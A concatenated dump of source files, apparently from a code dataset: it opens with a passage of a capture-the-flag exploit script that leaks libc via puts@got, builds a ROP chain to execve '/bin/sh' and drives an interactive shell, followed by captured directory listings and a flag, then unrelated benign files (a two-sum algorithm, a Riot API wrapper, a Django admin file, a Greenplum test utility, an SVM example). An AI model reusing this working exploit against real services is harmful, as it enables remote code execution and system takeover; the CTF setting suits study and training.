stage1 += p(puts_got)
stage1 += p(puts_plt)
stage1 += p(pop_rbp)
stage1 += p(buf+56)
stage1 += p(leave) # mov rsp, rbp; pop rbp; ret
stage1 += p(buf)
stage1 += p(main) #replay
name = stage1
raw_input("gdb")
s.send(name.ljust(1023, "\x00"))
s.send("128\n")
s.send("1\n")
for i in list(range(128)):
    s.send(str(buf) + "\n")
recv_until(s, "]\n")
# The leaked address is printed as a line; pad it back to 8 bytes.
leak = recv_until(s, "\n").replace("\n", "").ljust(8, "\x00")
leak = u(leak)
# Resolve libc symbols from the leaked puts address.
system = leak + system_off
sh = leak + sh_off
pop_rdx = leak - 0x6e2a2
execve = leak + 0x51500
print "[+] puts@got: " + hex(leak)
print "[+] execve: " + hex(execve)
print "[+] /bin/sh: " + hex(sh)
print "[+] pop rdx; ret: " + hex(pop_rdx)
#### stage 2 #####
# Stage 2: execve("/bin/sh", 0, 0) via libc gadgets.
stage2 = "A"*64 # seip from read(), see gdb
stage2 += p(pop_rdi)
stage2 += p(sh)
stage2 += p(pop_rdx)
stage2 += p(0)
stage2 += p(pop_rsi_)
stage2 += p(0)*2
stage2 += p(execve)
name = stage2
s.send(name.ljust(1023, "\x00"))
s.recv(1024)
time.sleep(1) #/bin/id => forbidden
print "\n\n"
# Interactive pseudo-shell over the socket.
while 1:
    s.send(raw_input("shell> ") + "\n")
    print s.recv(4096)
    time.sleep(0.2)
""" ls -la
total 104
drwxrwxr-x+ 22 root root 4096 Jul 18 09:23 .
drwxrwxr-x+ 22 root root 4096 Jul 18 09:23 ..
drwxr-xr-x 2 root root 4096 May 5 14:48 bin
drwxr-xr-x+ 3 root root 4096 May 19 15:53 boot
drwxr-xr-x+ 13 root root 3800 Jul 17 15:14 dev
drwxrwxr-x+ 97 root root 4096 Jul 21 16:17 etc
-r-------- 1 pwn001 root 51 May 5 15:43 flag
drwxr-xr-x 7 root root 4096 Jul 21 17:06 home
lrwxrwxrwx 1 root root 33 May 19 15:52 initrd.img -> boot/initrd.img-3.13.0-52-generic
lrwxrwxrwx 1 root root 33 Aug 13 2014 initrd.img.old -> boot/initrd.img-3.13.0-33-generic
drwxr-xr-x 21 root root 4096 May 5 14:56 lib
drwxr-xr-x 2 root root 4096 May 5 13:39 lib64
drwx------ 2 root root 16384 Aug 13 2014 lost+found
drwxr-xr-x+ 2 root root 4096 Aug 13 2014 media
drwxr-xr-x+ 2 root root 4096 Apr 11 2014 mnt
-rw-r--r-- 1 root root 399 Aug 26 2014 my_ssh_key
-rw-r--r-- 1 root root 451 Aug 26 2014 my_ssl_key
drwxr-xr-x+ 2 root root 4
096 Aug 13 2014 opt
drwxr-xr-x 101 root root 0 Jul 17 15:14 proc
drwx------ 3 root root 4096 Jul 21 17:00 root
drwxr-xr-x+ 19 root root 700 Jul 23 13:48 run
drwxr-xr-x+ 2 root root 12288 May 5 13:40 sbin
drwxr-xr-x+ 2 root root 4096 Aug 13 2014 srv
dr-xr-xr-x 13 root root 0 Jul 17 15:14 sys
drwxrwxrwt+ 2 root root 4096 Jul 25 17:39 t
mp
drwxr-xr-x+ 10 root root 4096 Aug 13 2014 usr
drwxr-xr-x+ 13 root root 4096 Jan 9 2015 var
lrwxrwxrwx 1 root root 30 May 19 15:52 vmlinuz -> boot/vmlinuz-3.13.0-52-generic
lrwxrwxrwx 1 root root 30 Aug 13 2014 vmlinuz.old -> boot/vmlinuz-3.13.0-33-generic
"""
""" ls -la /home
total 28
drwxr-xr-x 7 root root 4096 Jul 21 17:06 .
drwxrwxr-x+ 22 root root 4096 Jul 18 09:23 ..
drwx------ 2 pwn001 root 4096 May 7 10:32 pwn001
drwx------ 2 pwn002 root 4096 May 19 11:42 pwn002
drwx------ 3 pwn003 pwn003 4096 Jul 21 17:01 pwn003
drwxr-xr-x 4 tungpun tungpun 4096 Jul 21 17:04 tungpun
drwxr-xr-x 4 ubuntu ubuntu 4096 Jul 23 13:48 ubuntu
"""
"""cat /home/pwn002/fag
WhiteHat{456d6c0eaa6ab993a547389e40c3e9e5c6f188f9}
"""
SumOf2Num.py | Stephen-Kamau/Algo | 1 | 12762529 | <reponame>Stephen-Kamau/Algo<gh_stars>1-10
def SumOfTwoNums(array, target):
    """Return all pairs summing to *target* using the two-pointer technique.

    Fixes over the original implementation:
    - the caller's list is no longer sorted in place (sorted copy instead);
    - the unreachable ``else: print("passs")`` branch is removed (the three
      comparisons ==, >, < already cover every case).

    Args:
        array: list of numbers to search (left unmodified).
        target: required pair sum.

    Returns:
        List of (low, high) tuples, low <= high, in ascending order of low.
    """
    values = sorted(array)  # work on a copy -- do not mutate the argument
    pairs = []
    left = 0
    right = len(values) - 1
    while left < right:
        pair_sum = values[left] + values[right]
        if pair_sum == target:
            pairs.append((values[left], values[right]))
            # Move both pointers: each element is used at most once per pair.
            right -= 1
            left += 1
        elif pair_sum > target:
            right -= 1
        else:  # pair_sum < target
            left += 1
    return pairs
# using iterations
def GetTwoSumByIteration(array, target):
    """Brute-force variant: test every pair (i < j) in original order."""
    matches = []
    for i, first in enumerate(array[:-1]):
        for second in array[i + 1:]:
            if first + second == target:
                matches.append((first, second))
    return matches
# Quick manual check: both implementations should find the same pairs
# (two-pointer reports them sorted; brute force in input order).
res = SumOfTwoNums([3,5,-5,8,11,1,-1,6 ,4] , 10)
print(res)
res1 = GetTwoSumByIteration([3,5,-5,8,11,1,-1,6 ,4] , 10)
print(res1)
| 3.9375 | 4 |
champData.py | Scew5145/TentacleBot | 1 | 12762530 | <reponame>Scew5145/TentacleBot
import json
import sys
import requests
class championDB:
    """Wrapper around the Riot static-data API for champion lookups.

    Static-data endpoints are not rate limited ("there's no limit on static
    requests"), so data is fetched on demand instead of being cached.
    """

    riotKey = ''  # Riot API key; overwritten per instance in __init__.

    def __init__(self, _riotKey):
        self.riotKey = _riotKey

    def get_champId(self, championName):
        """Return the numeric champion id for *championName* (case-insensitive).

        Returns -1 for an unknown champion name and -2 when the HTTP request
        fails (original behavior preserved: errors are reported via return
        codes, not exceptions).

        Endpoint: https://developer.riotgames.com/api-methods/#lol-static-data-v3/GET_getChampionList
        """
        url = 'https://na1.api.riotgames.com/lol/static-data/v3/champions?dataById=true&api_key='
        url += self.riotKey
        response = requests.get(url)
        if response.status_code != 200:
            print('something went wrong with retrieving the id.')
            print('Error code: ', response.status_code)
            return -2
        champData = json.loads(response.text)
        # Renamed from `id` to avoid shadowing the builtin.
        champ_id = -1
        for key in champData['data']:
            if championName.lower() == champData['data'][key]['name'].lower():
                champ_id = champData['data'][key]['id']
        if champ_id == -1:
            print("Couldn't find champion " + championName + '.')
        return champ_id

    def get_bstats(self, championid):
        """Fetch the base-stat dict for *championid*.

        Always includes a 'statuscode' key so callers can show context-specific
        error messages (e.g. Discord reply vs. print()).  Stat field names:
        https://developer.riotgames.com/api-methods/#lol-static-data-v3/GET_getChampionById
        """
        url = 'https://na1.api.riotgames.com/lol/static-data/v3/champions/'
        url += str(championid)
        url += '?champData=stats&api_key='
        url += self.riotKey
        response = requests.get(url)
        if response.status_code != 200:
            return {'statuscode': response.status_code}
        statDict = json.loads(response.text)
        statDict.update({'statuscode': response.status_code})
        return statDict

    def get_levelinfo(self, level, id):
        # TODO: Implement Stat calc for champion
        statdict = {}
        return statdict
| 2.953125 | 3 |
classroom/admin.py | HelloYeew/ta_assistant_django | 0 | 12762531 | <filename>classroom/admin.py
from django.contrib import admin
from .models import Class
admin.site.register(Class)
| 1.398438 | 1 |
src/test/tinc/tincrepo/mpp/gpdb/tests/storage/walrepl/lib/pg_util.py | khuddlefish/gpdb | 0 | 12762532 | <filename>src/test/tinc/tincrepo/mpp/gpdb/tests/storage/walrepl/lib/pg_util.py
"""
Copyright (c) 2004-Present Pivotal Software, Inc.
This program and the accompanying materials are made available under
the terms of the under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import os
import socket
import time
import tinctest
from gppylib.db import dbconn
from tinctest.lib import local_path
from gppylib.commands.base import Command, REMOTE
from mpp.lib.PSQL import PSQL
from mpp.gpdb.tests.storage.walrepl import lib as walrepl
from mpp.gpdb.tests.storage.walrepl.lib import SmartCmd
from mpp.gpdb.tests.storage.walrepl.lib.verify import StandbyVerify
class GpUtility(object):
def __init__(self):
    # Cache the GPDB environment this utility operates against.
    self.gphome = os.environ.get('GPHOME')  # Greenplum installation dir
    self.pgport = os.environ.get('PGPORT')  # master listener port
    self.master_dd = os.environ.get('MASTER_DATA_DIRECTORY')  # master data dir
def run(self, command=''):
    '''Runs command, returns status code and stdout '''
    # Source greenplum_path.sh first so GPDB binaries are on PATH.
    cmd = Command(name='Running cmd %s'%command, cmdStr="source %s/greenplum_path.sh; %s" % (self.gphome,command))
    tinctest.logger.info(" %s" % cmd)
    try:
        cmd.run(validateAfter=False)
    except Exception, e:
        # Log and fall through; the caller inspects rc/stdout instead.
        tinctest.logger.error("Error running command %s\n" % e)
    result = cmd.get_results()
    tinctest.logger.info('Command returning status code: %s'%result.rc)
    tinctest.logger.info('Command returning standard output: %s'%result.stdout)
    return (result.rc, result.stdout)
def run_remote(self, standbyhost, rmt_cmd, pgport = '', standbydd = ''):
    '''Runs remote command and returns rc, result '''
    # Export the target instance's PGPORT/MASTER_DATA_DIRECTORY on the
    # remote side so the command acts on the right cluster.
    export_cmd = "source %s/greenplum_path.sh;export PGPORT=%s;export MASTER_DATA_DIRECTORY=%s" % (self.gphome, pgport, standbydd)
    remote_cmd = "gpssh -h %s -e '%s; %s'" % (standbyhost, export_cmd, rmt_cmd)
    tinctest.logger.info('cmd is %s'%remote_cmd)
    cmd = Command(name='Running Remote command', cmdStr='%s' % remote_cmd)
    tinctest.logger.info(" %s" % cmd)
    cmd.run(validateAfter=False)
    result = cmd.get_results()
    return result.rc,result.stdout
def check_and_start_gpdb(self):
    # Start the cluster only when it is not already running.
    # Returns True if already up; returns None after issuing gpstart.
    if not self.gpstartCheck():
        self.run('gpstart -a')
    else:
        return True
def check_and_stop_gpdb(self):
    # Stop the cluster only when it is running.
    # Returns True if already down; returns None after issuing gpstop.
    if self.gpstartCheck():
        self.run('gpstop -a')
    else:
        return True
def gpstartCheck(self):
    # Return True when pg_ctl status reports the master server is running.
    bashCmd = 'source ' + (self.gphome)+'/greenplum_path.sh;'+(self.gphome)+'/bin/pg_ctl status -D $MASTER_DATA_DIRECTORY | grep \'pg_ctl: server is running\''
    (ok,out) = self.run(bashCmd)
    if out == '' or out == []:
        return False
    return True
def get_pid_by_keyword(self, host="localhost", user=os.environ.get('USER'), pgport=os.environ.get('PGPORT'), keyword='None', option=''):
    """Return the pid of the postgres process on *host* matching *keyword*
    (and optional extra filter *option*) for the given port, or -1 if none.
    """
    # On some agents the value of the MASTER_DATA_DIRECTORY i.e keyword here
    # contains // in the string which causes the grep to fail in finding the
    # process pid, so replacing // with /.
    keyword = keyword.replace("//","/")
    grepCmd="ps -ef|grep postgres|grep %s|grep \'%s\'|grep \'%s\'|grep -v grep|awk \'{print $2}\'" % (pgport, keyword, option)
    cmd = "%s/bin/gpssh -h %s -u %s \"%s\"" % (os.environ.get('GPHOME'), host, user, grepCmd)
    (rc, out) = self.run(cmd)
    output = out.split()
    # gpssh output is "[host] pid", so the pid is the third token.
    if not rc and len(output) > 1:
        return output[2]
    else:
        tinctest.logger.error("error: process %s does not exist on host %s"%(keyword,host))
        return -1
def gpstart_and_verify(self, master_dd=os.environ.get('MASTER_DATA_DIRECTORY'), host='localhost'):
    # Verify the postmaster for *master_dd* on *host* is alive by probing
    # its pid with `kill -s 0` (signal 0 only checks process existence).
    pid = walrepl.get_postmaster_pid(master_dd, host)
    tinctest.logger.info("gpstart_verify: master dd is %s, host is %s, master pid is %s"%(master_dd,host, pid))
    if pid == -1:
        return False
    cmd_str = 'kill -s 0 {pid}'.format(pid=pid)
    cmd = SmartCmd(cmd_str, host=host)
    cmd.run()
    results = cmd.get_results()
    return results.rc == 0
def gpstop_and_verify(self, option = ''):
    """
    Stop the cluster with ``gpstop -a <option>`` and verify the expected
    post-state for that option:
      '-u' reload config only (verified by logging in as a freshly added
           pg_hba.conf user), '-r' restart (all segments back in sync),
      '-y' stop all but the standby, '-m' stop master only,
      default: everything down.
    Returns True on success, False otherwise.
    """
    sql = 'select hostname, port, content, preferred_role from gp_segment_configuration;'
    segments = self.run_SQLQuery(sql,dbname= 'template1')
    if option == '-u':
        # Add a throwaway user + pg_hba entry, reload, then verify the new
        # entry took effect by logging in with it.
        std_sql = 'drop user if exists gptest; create user gptest LOGIN PASSWORD \'<PASSWORD>\'; '
        PSQL.run_sql_command(std_sql, flags = '-q -t', dbname= 'template1')
        new_entry = 'local all gptest password \n'
        self.add_entry(line = new_entry)
        self.run('gpstop -a %s'%option)
        return self.gpreload_verify('gptest', 'testpassword')
    (rc, output) = self.run('gpstop -a %s'%option)
    if rc != 0:
        return False
    if option == '-r':
        # After a restart every segment must be synchronized and up.
        no_sync_up_segment_sql = 'select content, preferred_role from gp_segment_configuration where mode <> \'s\' or status <> \'u\';'
        segments_with_issue = self.run_SQLQuery(no_sync_up_segment_sql,dbname= 'template1')
        if segments_with_issue:
            return False
    elif option == '-y':
        # Everything down except the standby master.
        for segment in segments:
            seg_content = segment[2]
            seg_preferred_role = segment[3]
            seg_host = segment[0]
            seg_port = segment[1]
            if seg_content == -1 and seg_preferred_role == 'm':
                pid = self.get_pid_by_keyword(host=seg_host, pgport=seg_port, keyword='bin')
                if pid < 0:
                    tinctest.logger.error("standby host should not be shutdown.")
            else:
                pid = self.get_pid_by_keyword(host=seg_host, pgport=seg_port, keyword='bin')
                if pid > 0:
                    tinctest.logger.error("%s segment on host %s was not properly shutdown"%(seg_preferred_role, seg_host))
                    return False
    elif option == '-m':
        # Master only down; all other segments must remain up.
        for segment in segments:
            seg_content = segment[2]
            seg_preferred_role = segment[3]
            seg_host = segment[0]
            seg_port = segment[1]
            if seg_content == -1 and seg_preferred_role == 'p':
                pid = self.get_pid_by_keyword(host=seg_host, pgport=seg_port, keyword='bin')
                if pid > 0:
                    tinctest.logger.error("master should shutdown but still is running")
                    return False
            else:
                pid = self.get_pid_by_keyword(host=seg_host, pgport=seg_port, keyword='bin')
                if pid < 0:
                    tinctest.logger.error("%s segment on host %s should not be shutdown"%(seg_preferred_role, seg_host))
                    return False
    else:
        # Full stop: no segment process may survive.
        for segment in segments:
            seg_content = segment[2]
            seg_preferred_role = segment[3]
            seg_host = segment[0]
            seg_port = segment[1]
            pid = self.get_pid_by_keyword(host=seg_host, pgport=seg_port, keyword='bin')
            if pid > 0:
                tinctest.logger.error("%s segment on host %s was not properly shutdown"%(seg_preferred_role, seg_host))
                return False
    return True
def check_standby_presence(self):
    """Return True when gp_segment_configuration lists a standby master."""
    stdby_sql = 'select hostname from gp_segment_configuration where content = -1 and preferred_role = \'m\';'
    stdby_host = PSQL.run_sql_command(stdby_sql, flags='-q -t', dbname='template1')
    return bool(stdby_host.strip())
def add_entry(self, line = ''):
    ''' add one entry into the pg_hba.conf'''
    # Appends *line* verbatim to the master's pg_hba.conf.
    with open(local_path(self.master_dd + '/pg_hba.conf'),'a') as pgfile:
        pgfile.write(line)
def gpreload_verify(self, user, password):
    '''verify that the entry is effective after reload '''
    login_cmd = 'export PGPASSWORD=%s; psql -U %s -d template1' % (password, user)
    (rc, out) = self.run(command=login_cmd)
    # Login works only when psql exits cleanly and prints no FATAL message.
    return rc == 0 and "FATAL" not in out
def install_standby(self, new_stdby_host = '', standby_mdd=os.environ.get('MASTER_DATA_DIRECTORY')):
    """
    Creating a new standby, either on localhost, or on a remote host.
    standby_mdd: base master data directory used to derive the standby's
        filespace locations (defaults to $MASTER_DATA_DIRECTORY).
    new_stdby_host: if empty, the first primary segment's host is used as
        the default standby host.
    """
    if new_stdby_host == '':
        # Pick the host of the content-0 primary as the standby host.
        get_host = 'select hostname from gp_segment_configuration where content = 0 and preferred_role = \'p\';'
        host = PSQL.run_sql_command(get_host, flags = '-q -t', dbname= 'template1')
        new_stdby_host = host.strip()
        tinctest.logger.info("New standby host to config %s" % new_stdby_host)
        if not new_stdby_host:
            raise Exception("Did not get a valid host name to install standby")
    # Standby listens one port above the master.
    standbyport = str(int(self.pgport) + 1)
    (standby_filespace,filespace_loc) = self.get_concatinate_filespace(standby_mdd)
    # Pre-create (and empty) every filespace directory on the standby host.
    for fsp in filespace_loc:
        self.create_dir(new_stdby_host,fsp)
        self.clean_dir(new_stdby_host, fsp)
    init_stdby = "gpinitstandby -a -s %s -P %s -F \'%s\'"%(new_stdby_host,
                                                           standbyport,
                                                           standby_filespace)
    tinctest.logger.info("New standby init command: %s" % init_stdby)
    self.run(init_stdby)
def get_concatinate_filespace(self, standby_mdd=os.environ.get('MASTER_DATA_DIRECTORY')):
    '''
    Get a concatenated filespace string ("name:path,name:path,...") to
    create a standby on a host, with each dir equal to: filespace_dir/newstandby.
    Returns (filespace_spec_string, list_of_standby_directories).
    '''
    standby_dir = os.path.split(standby_mdd)[0]
    last_dir = os.path.split(standby_dir)[1]
    # pg_system filespace lives next to the master dir, suffixed _newstandby.
    pg_system_filespace = os.path.join(os.path.split(standby_dir)[0], last_dir + '_newstandby')
    pg_filespace = 'pg_system:'+ pg_system_filespace
    # All non-pg_system (fsefsoid != 3052) filespace locations of the master.
    fs_sql = '''select fselocation from pg_filespace_entry
                where fsefsoid != 3052 and fsedbid = (select dbid from gp_segment_configuration
                where role = 'p' and content = -1);'''
    result = PSQL.run_sql_command(fs_sql, flags = '-q -t', dbname= 'template1')
    result = result.strip()
    filespace_loc = result.split('\n')
    tinctest.logger.info('filespace_loc: %s'%filespace_loc)
    fsp_dir = []
    fsp_dir.append(pg_system_filespace)
    for fse_loc in filespace_loc:
        fse_loc = fse_loc.strip()
        if fse_loc != '':
            # get leaf node from the dir
            prune_last1 = os.path.split(fse_loc)[0]
            # get the second level node name from backward
            parent_dir = os.path.split(prune_last1)[1]
            # remove the second level and continue to get the third level
            # leaf node which is the filespace name
            prune_last2 = os.path.split(prune_last1)[0]
            filespace = os.path.split(prune_last2)[1]
            # specify the filespace location on standby side
            filespace_location_stdby = os.path.split(standby_dir)[0] + '_newstandby' + '/'+filespace+'/'+parent_dir + '/' + last_dir + '_newstandby'
            pg_filespace = pg_filespace + ',' + filespace + ':' + filespace_location_stdby
            fsp_dir.append(filespace_location_stdby)
    tinctest.logger.info("pg_filespace is %s"%pg_filespace)
    tinctest.logger.info("fsp_dir is %s"%fsp_dir)
    return (pg_filespace,fsp_dir)
def failback_to_original_master(self, old_mdd = os.environ.get('MASTER_DATA_DIRECTORY'),new_master_host = '', new_master_mdd=os.environ.get('MASTER_DATA_DIRECTORY'), new_master_port = ''):
    """
    Fail back to the original master host: derive the filespace layout from
    the current (new) master, re-create those directories on the original
    master host, init a standby there via remote gpinitstandby, then stop
    the new master and activate the standby (see activate()).
    """
    (master_filespace,filespace_loc) = self.get_concatinate_filespace_new_master(old_mdd, new_master_host, new_master_mdd, new_master_port)
    tinctest.logger.info('master_filespace is %s'%master_filespace)
    tinctest.logger.info('filespace_loc %s'%filespace_loc)
    # Prepare clean filespace dirs on the original (local) master host.
    for fsp in filespace_loc:
        self.create_dir(socket.gethostname(),fsp)
        self.clean_dir(socket.gethostname(),fsp)
    init_stdby = "gpinitstandby -a -s %s -P %s -F \'%s\'"%(socket.gethostname(),
                                                           self.pgport,
                                                           master_filespace)
    tinctest.logger.info("New standby init command: %s" % init_stdby)
    # Run gpinitstandby from the new master so it registers this host.
    self.run_remote(new_master_host, init_stdby, new_master_port, new_master_mdd)
    self.activate(old_mdd,new_master_host, new_master_mdd, new_master_port)
def activate(self, old_mdd=os.environ.get('MASTER_DATA_DIRECTORY'), new_master_host='', new_master_mdd='', new_master_port=''):
    ''' Stop the remote master and activate new standby on old master host'''
    # Immediate master-only stop of the remote master.
    self.run_remote(new_master_host, 'gpstop -aim', new_master_port, new_master_mdd)
    gpactivate_cmd = 'gpactivatestandby -a -d %s' %(old_mdd)
    (rc, result) = self.run_remote(socket.gethostname(),gpactivate_cmd,self.pgport,self.master_dd)
    tinctest.logger.info('Result without force option to activate standby %s'%result)
    # Retry with -f when gpactivatestandby asks for force activation.
    if (rc != 0) and result.find('Force activation required') != -1:
        tinctest.logger.info('activating standby failed, try force activation...')
        gpactivate_cmd = 'gpactivatestandby -a -f -d %s' %(old_mdd)
        (rc, result) = self.run_remote(socket.gethostname(),gpactivate_cmd,self.pgport,self.master_dd)
        if (rc != 0):
            tinctest.logger.error('Force activating standby failed!')
            return False
    tinctest.logger.info('standby acvitated, host value %s' % socket.gethostname())
    return True
def get_concatinate_filespace_new_master(self, old_mdd, new_master_host='', new_master_mdd='', new_master_port=''):
    '''
    Get a concatenated filespace string, in order to init a standby on the
    old master host.  The filespace locations are queried on the NEW master
    (via gpssh) and mapped back to the original master's directory layout.
    Returns (filespace_spec_string, list_of_directories_to_create).
    '''
    fs_sql = ''' select fselocation from pg_filespace_entry
                 where fsefsoid != 3052 and fsedbid = (select dbid from gp_segment_configuration
                 where role = 'p' and content = -1);'''
    # Ship the query to the new master as a file and run it there.
    file = '/tmp/filespace.sql'
    fp = open(file,'w')
    fp.write(fs_sql)
    fp.close()
    cmd = 'scp %s %s:/tmp'%(file, new_master_host)
    self.run(cmd)
    #new_master_postfix = os.path.split(new_master_mdd)[1]
    pg_system_filespace = old_mdd
    last_dir = os.path.split(old_mdd)[1]
    pg_filespace = 'pg_system:'+ pg_system_filespace
    get_filespace_cmd = 'psql --pset pager=off template1 -f %s'%file
    tinctest.logger.info('remote command to run for getting filespace locations %s'%get_filespace_cmd)
    (rc, stdout) = self.run_remote(new_master_host, get_filespace_cmd, new_master_port, new_master_mdd)
    tinctest.logger.info('stdout from remote executing sqls on new master is %s'%stdout)
    result = stdout.strip()
    filespace_loc = result.split('\n')
    # gpssh output framing: drop the first 3 and last 2 lines (banner,
    # column header, separator, row count, prompt).
    for i in xrange(3):
        if not filespace_loc:
            break
        else:
            filespace_loc.pop(0)
    for i in xrange(2):
        if not filespace_loc:
            break
        else:
            filespace_loc.pop()
    tinctest.logger.info('after removing unncessary result from gpssh, filespace_loc is %s'%filespace_loc)
    # strip and split each line, to retrieve each filespace loc
    # (each gpssh line looks like "[host] <location>", third token is the path)
    filespace_list = []
    for fse_loc in filespace_loc:
        fse_loc = fse_loc.strip().split(' ')[2]
        filespace_list.append(fse_loc)
    tinctest.logger.info('filespace_list: %s'%filespace_list)
    tinctest.logger.info('split and continue removing unncessary information from gpssh, filespace_list is %s'%filespace_list)
    fsp_dir = []
    fsp_dir.append(pg_system_filespace)
    for fse_loc in filespace_list:
        fse_loc = fse_loc.strip()
        if fse_loc != '':
            # truncate the last two leaf nodes in order to get the filespace name
            prune_last1 = os.path.split(fse_loc)[0]
            prune_last2 = os.path.split(prune_last1)[0]
            filespace = os.path.split(prune_last2)[1]
            # Map the new master's "_newstandby" layout back to the original.
            filespace_location_stdby = prune_last1.replace('_newstandby', '') + '/' + last_dir
            #prune_last1 = prune_last1.replace(new_master_postfix,'master')
            pg_filespace = pg_filespace + ',' + filespace + ':' + filespace_location_stdby
            fsp_dir.append(filespace_location_stdby)
    tinctest.logger.info("pg_filespace is %s"%pg_filespace)
    tinctest.logger.info("fsp_dir is %s"%fsp_dir)
    return (pg_filespace,fsp_dir)
def clean_dir(self,host,dir):
    # Recursively delete *dir* on *host* via gpssh.
    cmd = "%s/bin/gpssh -h %s -e 'rm -rf %s'" % (self.gphome,host,dir)
    self.run(cmd)
def create_dir(self, host, dir):
    # Create *dir* (including parents) on *host* via gpssh.
    cmd = "%s/bin/gpssh -h %s -e 'mkdir -p %s'" % (self.gphome,host,dir)
    self.run(cmd)
def remove_standby(self):
    # Deregister and remove the standby master from the cluster.
    self.run('gpinitstandby -r -a')
def run_SQLQuery(self, exec_sql, dbname, hostname='localhost', port=os.environ['PGPORT']):
    """Execute *exec_sql* against *dbname* and return all result rows."""
    with dbconn.connect(dbconn.DbURL(dbname=dbname, hostname=hostname, port=port)) as conn:
        curs = dbconn.execSQL(conn, exec_sql)
        results = curs.fetchall()
        return results
def stop_logger_process(self, host, port):
    """Send SIGSTOP to the logger process(es) of the segment on *port*.

    When *host* is falsy the commands run locally; otherwise they run on
    the remote *host* (mirroring stop_postmaster_process below).
    """
    grep_expr = '[p]ostgres: port\s*%s,.*logger process' % port
    tinctest.logger.info('Grep expr = %s' % grep_expr)
    if host:
        # Remote: the awk $ must be escaped so gpssh does not expand it.
        cmd = Command('get the pid for a primary process', cmdStr='ps -ef | grep "%s" | awk \'{print \$2}\'' % grep_expr,
                      ctxt=REMOTE, remoteHost=host)
    else:
        cmd = Command('get the pid for a primary process', cmdStr='ps -ef | grep "%s" | awk \'{print $2}\'' % grep_expr)
    cmd.run(validateAfter=True)
    result = cmd.get_results()
    tinctest.logger.info('Result of grep command = %s' % result)
    pid_list = map(int, result.stdout.strip().split('\n'))
    for pid in pid_list:
        tinctest.logger.info('Killing primary segment with pid %s' % pid)
        if host:
            cmd = Command('Stop a logger process', cmdStr='kill -SIGSTOP %s' % pid, ctxt=REMOTE, remoteHost=host)
        else:
            # BUG FIX: this branch previously duplicated the remote branch
            # (ctxt=REMOTE, remoteHost=host) even though host is falsy here,
            # which cannot target a valid remote host. Run locally instead,
            # consistent with stop_postmaster_process.
            cmd = Command('Stop a logger process', cmdStr='kill -SIGSTOP %s' % pid)
        cmd.run(validateAfter=True)
def stop_postmaster_process(self, host, port):
grep_expr = '[p]ostgres -D .* -p %s' % port
tinctest.logger.info('Grep expr = %s' % grep_expr)
if host:
cmd = Command('get the pid for a primary process', cmdStr='ps -ef | grep "%s" | awk \'{print \$2}\'' % grep_expr,
ctxt=REMOTE, remoteHost=host)
else:
cmd = Command('get the pid for a primary process', cmdStr='ps -ef | grep "%s" | awk \'{print $2}\'' % grep_expr)
cmd.run(validateAfter=True)
result = cmd.get_results()
tinctest.logger.info('Result of grep command = %s' % result)
pid_list = map(int, result.stdout.strip().split('\n'))
for pid in pid_list:
tinctest.logger.info('Killing primary segment with pid %s' % pid)
if host:
cmd = Command('Stop a process on remote host', cmdStr='kill -SIGSTOP %s' % pid, ctxt=REMOTE, remoteHost=host)
else:
cmd = Command('Stop a process on remote host', cmdStr='kill -SIGSTOP %s' % pid)
cmd.run(validateAfter=True)
def stop_gpmmon_process(self, hostname):
grep_expr = '[g]pmmon -D .*'
tinctest.logger.info('Grep expr = %s' % grep_expr)
cmd = Command('get the pid for gpmmon', cmdStr="ps -ef | grep '%s' | awk '{print \$2}'" % grep_expr, ctxt=REMOTE, remoteHost=hostname)
cmd.run(validateAfter=True)
result = cmd.get_results()
pid = ' '.join([p.strip() for p in result.stdout.strip().split('\n')])
if pid:
cmd = Command('stopping the gpmmon process', cmdStr='kill -SIGSTOP %s' % pid, ctxt=REMOTE, remoteHost=hostname)
cmd.run(validateAfter=True)
else:
raise Exception('Unable to find gpmmon process. Please make sure it is installed')
    def stop_gpsmon_process(self, hostname):
        """SIGSTOP the gpsmon process on *hostname*, polling until exactly
        one matching pid is visible (up to 60 one-second retries).

        NOTE(review): if 60 retries elapse without ever seeing a single pid,
        the method returns silently -- confirm whether that is intended.
        """
        grep_expr = '[g]psmon -m .*'
        tinctest.logger.info('Grep expr = %s on host %s' % (grep_expr, hostname))
        retries = 60
        for r in range(retries):
            cmd = Command('get the pid for gpsmon', cmdStr="ps -ef | grep '%s' | awk '{print \$2}'" % grep_expr, ctxt=REMOTE, remoteHost=hostname)
            cmd.run(validateAfter=True)
            result = cmd.get_results()
            # Retry while gpsmon has not started yet (no output) or while more
            # than one matching process is listed.
            if not result.stdout.strip() or len(result.stdout.strip().split('\n')) > 1:
                time.sleep(1)
                continue
            pid = ' '.join([p.strip() for p in result.stdout.strip().split('\n')])
            if pid:
                cmd = Command('stopping the gpsmon process', cmdStr='kill -SIGSTOP %s' % pid, ctxt=REMOTE, remoteHost=hostname)
                cmd.run(validateAfter=True)
                break
            else:
                raise Exception('Unable to find gpsmon process. Please make sure it is installed')
def verify_gpmmon(self):
gpmmon_grep_expr = '[g]pmmon -D .*'
cmd = Command('get the pid for gpmmon', cmdStr="ps -ef | grep '%s' | awk '{print $2}'" % gpmmon_grep_expr)
try:
cmd.run(validateAfter=True)
except Exception as e:
pass
else:
result = cmd.get_results()
if result.stdout.strip() != '':
raise Exception('Found gpmmon process with pid %s' % result.stdout.strip())
def verify_gpsmon(self, hostname):
gpsmon_grep_expr = '[g]psmon -m .*'
cmd = Command('get the pid for gpsmon process', cmdStr="ps -ef | grep '%s' | awk '{print \$2}'" % gpsmon_grep_expr,
ctxt=REMOTE, remoteHost=hostname)
try:
cmd.run(validateAfter=True)
except Exception as e:
pass
else:
result = cmd.get_results()
if result.stdout.strip() != '':
raise Exception('Found gpsmon process with pid %s' % result.stdout.strip())
| 2 | 2 |
tests/example_svmlr.py | salmuz/svm-label-ranking | 2 | 12762533 | <reponame>salmuz/svm-label-ranking<gh_stars>1-10
from svm_label_ranking import arff
from svm_label_ranking.model import SVMLR
# Example script executing the SVM label-ranking model on the IRIS data set.
# By default, we set the possible value of hyper-parameter v=[0.1, 0.4, 0.7, 0.9, 8, 24, 32, 128]. It could be
# assigned to other values by modifying the __init__ of the class.
# We start by creating an instance of the base classifier we want to use
print("Example of SVM label ranking - Data set IRIS \n")
v = list([0.1, 0.4, 0.7, 0.9, 8, 24, 32, 128])
# NOTE(review): `v` is built above but never passed to SVMLR() -- presumably
